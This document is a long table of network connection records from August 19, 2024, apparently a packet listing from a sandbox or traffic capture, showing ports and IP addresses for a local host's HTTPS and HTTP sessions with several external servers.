Aug 19, 2024 09:28:47.940165997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.940229893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.940418959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.941509962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.941535950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.941597939 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.941613913 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.941673994 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.942127943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.942143917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.942202091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.942215919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.942260981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.981115103 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.981137991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.981256962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.981307030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:47.981355906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:47.997442007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.030045033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.030075073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.030158043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.030190945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.030229092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.031693935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.031713963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.031765938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.031778097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.031816006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.032048941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032064915 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032095909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.032104015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032128096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.032145023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.032279015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032294035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032332897 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.032340050 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032368898 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.032556057 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032571077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032608986 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.032615900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.032644033 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.034034014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.034050941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.034100056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.034121037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.034152985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.034710884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.034727097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.034770012 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.034782887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.034817934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.037467003 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.074033976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.074064970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.074147940 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.074234962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.074278116 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.074301958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.092725039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.122791052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.122817993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.122890949 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.122919083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.122955084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.124625921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.124650002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.124686003 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.124692917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.124736071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.124939919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.124958038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.124990940 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.124996901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.125022888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.125047922 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.125168085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.125184059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.125231981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.125238895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.125269890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.125468969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.125488043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.125526905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.125534058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.125566959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.127013922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.127033949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.127089977 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.127096891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.127144098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.127443075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.165798903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.165822029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.166047096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.166131020 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.166187048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.166412115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.166430950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.166482925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.166497946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.166570902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.168518066 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.215626955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.215656042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.215699911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.215715885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.215748072 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.217150927 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217170954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217233896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.217240095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217278957 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.217438936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217454910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217499018 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.217510939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217540979 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.217905045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217921019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217958927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.217966080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.217986107 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.218003035 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.218070030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.218087912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.218128920 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.218135118 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.218164921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.219724894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.219743967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.219799995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.219808102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.219842911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.222870111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.258481979 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.258508921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.258583069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.258676052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.258725882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.258725882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.258997917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.259015083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.259054899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.259071112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.259099960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.259119987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.311261892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.311290026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.311374903 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.311388016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.311422110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.313003063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.313054085 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.313065052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.313086987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.313122034 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.322138071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.322158098 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.322173119 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:48.322179079 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:48.944530964 CEST	49761	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:48.949615002 CEST	80	49761	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:48.949692965 CEST	49761	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:48.949852943 CEST	49761	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:48.949894905 CEST	49761	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:48.954737902 CEST	80	49761	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:48.954749107 CEST	80	49761	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:50.137999058 CEST	80	49761	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:50.138016939 CEST	80	49761	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:50.138098001 CEST	49761	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:50.138278961 CEST	80	49761	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:50.138319016 CEST	49761	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:50.138339996 CEST	49761	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:50.142327070 CEST	49762	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:50.143323898 CEST	80	49761	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:50.147361994 CEST	80	49762	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:50.147509098 CEST	49762	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:50.148668051 CEST	49762	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:50.148682117 CEST	49762	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:50.153465986 CEST	80	49762	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:50.153791904 CEST	80	49762	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:51.211571932 CEST	80	49762	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:51.211867094 CEST	80	49762	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:51.211914062 CEST	49762	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:51.212315083 CEST	49762	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:51.216161013 CEST	49763	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:51.217047930 CEST	80	49762	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:51.221033096 CEST	80	49763	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:51.221090078 CEST	49763	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:51.221196890 CEST	49763	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:51.221229076 CEST	49763	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:51.225975990 CEST	80	49763	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:51.226058006 CEST	80	49763	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:52.286766052 CEST	80	49763	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:52.287184954 CEST	80	49763	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:52.292927980 CEST	49763	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:52.353662968 CEST	49763	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:52.358745098 CEST	80	49763	189.163.89.217	192.168.2.4
Aug 19, 2024 09:29:12.164026976 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:12.164066076 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:12.164163113 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:12.167604923 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:12.167617083 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:12.662204981 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:12.662267923 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:12.709327936 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:12.709357023 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:12.709654093 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:12.758851051 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:13.109453917 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:13.109534025 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:13.109587908 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:13.516125917 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:13.516211987 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:13.516263008 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:13.518352985 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:13.518352985 CEST	49764	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:13.518381119 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:13.518393993 CEST	443	49764	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:13.802320004 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:13.802375078 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:13.802608013 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:13.802939892 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:13.802954912 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.290314913 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.290393114 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:14.295535088 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:14.295546055 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.295789957 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.301074028 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:14.301275015 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:14.301299095 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.702727079 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.702825069 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.702913046 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:14.707595110 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:14.707614899 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.707643032 CEST	49765	443	192.168.2.4	172.67.166.231
Aug 19, 2024 09:29:14.707648039 CEST	443	49765	172.67.166.231	192.168.2.4
Aug 19, 2024 09:29:14.733845949 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:14.733867884 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:14.733935118 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:14.734299898 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:14.734313011 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.230635881 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.230729103 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:15.234684944 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:15.234704971 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.234945059 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.236099958 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:15.236129045 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:15.236157894 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.973162889 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.973412991 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.973470926 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:15.973867893 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:15.973890066 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.973902941 CEST	49766	443	192.168.2.4	172.67.204.20
Aug 19, 2024 09:29:15.973908901 CEST	443	49766	172.67.204.20	192.168.2.4
Aug 19, 2024 09:29:15.996054888 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:15.996100903 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:15.996170044 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:15.996516943 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:15.996531963 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:16.483112097 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:16.483912945 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:16.486917973 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:16.486931086 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:16.487262964 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:16.488492012 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:16.488492012 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:16.488583088 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:16.990353107 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:16.990591049 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:16.990848064 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:16.990848064 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:16.991164923 CEST	49767	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:16.991184950 CEST	443	49767	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:17.034492016 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:17.034534931 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:17.034601927 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:17.034900904 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:17.034915924 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:17.529923916 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:17.530049086 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:17.532130957 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:17.532143116 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:17.532576084 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:17.533721924 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:17.533756971 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:17.533817053 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:17.979763031 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:17.979990959 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:17.980178118 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:18.030695915 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:18.030720949 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:18.030734062 CEST	49768	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:29:18.030740023 CEST	443	49768	188.114.97.3	192.168.2.4
Aug 19, 2024 09:29:18.051986933 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:18.052048922 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:18.052174091 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:18.054532051 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:18.054549932 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:18.541464090 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:18.541547060 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:18.547852993 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:18.547864914 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:18.548324108 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:18.549484968 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:18.549514055 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:18.549624920 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:19.092279911 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:19.092619896 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:19.092679024 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:19.095694065 CEST	49769	443	192.168.2.4	104.21.14.101
Aug 19, 2024 09:29:19.095711946 CEST	443	49769	104.21.14.101	192.168.2.4
Aug 19, 2024 09:29:19.240201950 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:19.240313053 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:19.240401983 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:19.241703987 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:19.241729975 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:19.884387970 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:19.884457111 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:19.889080048 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:19.889095068 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:19.889489889 CEST	443	49770	188.114.96.3	192.168.2.4
Aug 19, 2024 09:29:19.890650034 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:19.890672922 CEST	49770	443	192.168.2.4	188.114.96.3
Aug 19, 2024 09:29:19.890760899 CEST	443	49770	188.114.96.3	192.168.2.4
